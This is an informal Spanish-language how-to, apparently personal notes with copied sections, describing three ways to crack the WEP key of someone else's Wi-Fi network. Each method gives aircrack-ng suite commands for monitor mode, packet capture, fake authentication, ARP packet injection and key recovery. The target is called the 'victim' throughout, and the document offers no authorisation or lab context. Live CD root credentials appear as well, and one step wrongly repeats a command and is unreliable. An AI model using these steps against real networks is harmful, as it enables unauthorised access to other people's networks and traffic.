Ya en la empezaremos checando las tarjetas wlan con el siguiente comando:

iwconfig
MI MAC
00:21:5C:0B:FA:63

cambiar canal al azar iwconfig wlan0 channel X

Livecd
user: root
pass: toor

Empezar: startx (si no funciona ponemos control + supr y luego xconf)

Abrir shell

Sacar nombre de interfaz: iwconfig (es el nombre de hasta la izquierda seguido de

ieee)

Desactivar la interfaz para luego entrar en modo monitor: airmon-ng stop

"interfaz"

Entrar en modo monitor: airmon-ng start "interfaz"

Escanear redes al alcance: airmon-ng start "interfaz"

Buscamos una que tenga wep, anotamos lo siguiente

MAC(BSSID): 23:82:7B:59:t6:76

CANAL(CH): Ej. 6

NOMBRE(ESSID): Infinitum2345

Luego abrimos otro shell y ponemos

airodump-ng -c "canal" --bssid "MACVICTIMA" -w captura "interfaz" (o quiza wlan0)

Autenticaci�n falsa para que deje inyectar paquetes

aireplay-ng -1 0 �e "NOMBRE RED VICTIMA(INFINITUMXXXX)" -a "MACVICTIMA" -h

11:22:33:44:55:66 "interfaz"

Inyectar Paquetes

aireplay-ng -3 -b "MACVICTIMA" -h 11:22:33:44:55:66 "interfaz"

Esperamos hasta que llegue a 150000 en ARP

Abrimos nueva shell (sin cerrar ninguna otra)

aircrack-ng -z *.cap (*es la ruta en la que tengamos el archivo de captura)

( a mi me gust� m�s el cometesta.cap jeje)

OTRO METODO

(este si es un vil copy/paste)

Te aparecen las tarjetas que tienes instaladas en el sistema, entre ellas la que
utilizar�s, yo utilizo

una alfa network de 500mw y me basar� en ella.

Una vez identificada tu tarjeta se procede a correr el modo monitor con el

siguiente comando:

airmon-ng start wlan0 6

Atenci�n: Con este comando se inicia el modo monitor en el canal 6, si deseas

utilizar otro canal para

detectar otras redes puedes sustituir el 6 por cualquier otro n�mero.

Despu�s de activado el modo monitor empezaremos a detectar redes en este caso en

el canal 6.

airodump-ng -w aaaa -c6 wlan0 (Aqu� mismo sustituyes -c6 por el canal que t�
quieras) (El aaaa es un

nombre de archivo elegido por t�, se puede llamar hola si t� quieres)

Escoges alguna red con encriptaci�n WEP, abres una nueva consola y escribes lo
siguiente:

aireplay-ng -1 30 -e XXXX -a MACV -h MACC wlan0

Ahora explico el comando:

XXXX - Aqu� va el ESSID de tu victima

MACV - Aqu� va la direcci�n MAC de tu v�ctima
MACC - Aqu� debes introducir la direcci�n MAC de tu wlan.

Quedar�a m�s o menos as�:

aireplay-ng -1 30 -e INFINITUMXXX -a 00:00:00:00:00 -h 00:00:00:01 wlan0

Con esto tu tarjeta quedar� asociada con el punto de acceso v�ctima

Ahora empezaremos a inyectar paquetes usando el siguiente comando:

aireplay-ng -3 -x600 -b MACV -h MACC wlan0 (En este momento ya debes saber donde
vas a sustituir y con

que)

Quedar�a m�s o menos as�:

aireplay-ng -3 -x600 -b 00:00:00:00:00 -h 00:00:00:00:01 wlan0

Despu�s de esto los paquetes empezar�n a ser enviados.

Despu�s de sobrepasados los 100,000 paquetes enviados se procede a obtener la

clave:

Abres una nueva consola y escribes lo siguiente:

aircrack-ptw aaaa-01.cap (Aqu� se utiliza el nombre de archivo que especificamos

casi al principio al

correr el airodump m�s el -01 o cualquier otro n�mero -02, -03 etc...)

Apuntas la clave WEP y listo.

_Otro

1)saber mi mac
2)saber la mac de la victima y el canal (utilizamos este programa: netbuster) A
buscar!
3)reiniciar pc con el wifislax en la lectora
4)usuario: root
5)pass: toor
6)para empezar ingresamos "startx"
7)si se pone la pantalla en negro por mucho tiempo presionamos ctrl + supr y nos
va a llevar de nuevo a la pantalla anterior en donde en vez de poner "startx"
vamos a introducir "xconf". este es un inconveniente con tu tarjeta grafica, nada
serio... seguimos.
8)vamos a la consola
9)lo primero que ponemos es "iwconfig" para ver si linux reconoce tu tarjeta de
red.
10)ingresamos "airmon-ng start wlan0 1" para pasar a modo monitor (lo que viene
acompa�ado de wlan es un cero) Explico un poco... el numero uno es el canal en
donde esta la victima que lo adquirimos en el punto numero 2 del este fant�stico
tutorial :p. El wlan0 es como linux tomo tu tarjeta de red.
11)luego ingresamos "airodump-ng -w datos -c1 wlan0" es un comando que crea un
archivo "datos" en el canal 1 con la tarjeta wlan0.
12)abrimos una nueva consola.
13)ingresamos lo siguiente "aireplay-ng -1 30 -e INFINITUMXXXX -a MAC VICTIMA -h
TU MAC wlan0" infinitum es el nombre de la victima que la encontramos en el punto
numero 2. La mac de la victima y tu mac... (lo unico que va en mayusculas son el
nombre, y las mac) ojo!! Todos los demas comandos en minusculas.
14)abrimos otra consola.
15)ingresamos "aireplay-ng -3 -x600 -b mac victima -h tu mac wlan0" inyectamos
paquetes al modem mientras que captura otros mas... vamos a necesitar 100.000
paquetes para decifrar la contrase�a...
16)tomate unos mates, dale bola a tu novia mientras bajan los paquetes...
17)abrimos otra consola (vamos 4).
18)ingresamos "aircrack-ptw datos-01.cap"
19)si no funciona, buscamos el archivo 01,02 o el que sea que pese mas bytes y lo
ejecutamos. Nos sale en la consola "clave encontrada bla bla"
20) Ya tenemos la contrase�a.